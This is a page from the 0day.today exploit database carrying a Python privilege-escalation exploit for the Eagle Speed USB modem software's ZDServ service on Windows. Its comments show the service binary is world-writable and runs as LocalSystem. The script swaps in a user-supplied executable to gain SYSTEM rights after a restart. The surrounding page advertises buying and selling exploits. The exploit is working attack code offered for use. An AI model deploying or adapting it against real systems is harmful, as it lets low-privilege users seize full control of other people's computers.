0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Eagle Speed USB Modem Software Privilege Escalation Exploit
[#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is installed.
# The service itself has the right permissions which do not allow to reconfigure the binary
# but the path the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
# TYPE : 110 WIN32_OWN_PROCESS (interactive)
# START_TYPE : 2 AUTO_START
# ERROR_CONTROL : 1 NORMAL
# BINARY_PATH_NAME : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# LOAD_ORDER_GROUP :
# TAG : 0
# DISPLAY_NAME : ZDServ
# DEPENDENCIES :
# SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions.
# NT AUTHORITY\SYSTEM:(I)(F)
# BUILTIN\Administrators:(I)(F)
# Victim-PC\lowpriv:(I)(F)
# BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#
import os
import sys
import filecmp
path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
banner = "\n\n"
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
if(len(sys.argv) < 2):
print '\n Usage : exploit.py program.exe\n'
print 'https://infogen.al/'
else:
program = sys.argv[1]
if(not os.path.isfile(program)):
print "[-] The parameter was incorrect, use a correct filename [-]"
exit(0)
if(not os.path.isfile(path)):
print "[-] File not found , propably service doesn't exists [-]\n"
else:
print "[+] Backing up the binary [+]"
os.system(file_move)
print "[+] Copying the payload [+]"
os.system("copy " + program + " " + path)
if(filecmp.cmp(program,path)):
print "[+] Exploit successfull, wait for service to restart or reboot [+]"
else:
print "[-] Exploit failed [-]"
# 0day.today [2024-11-16] #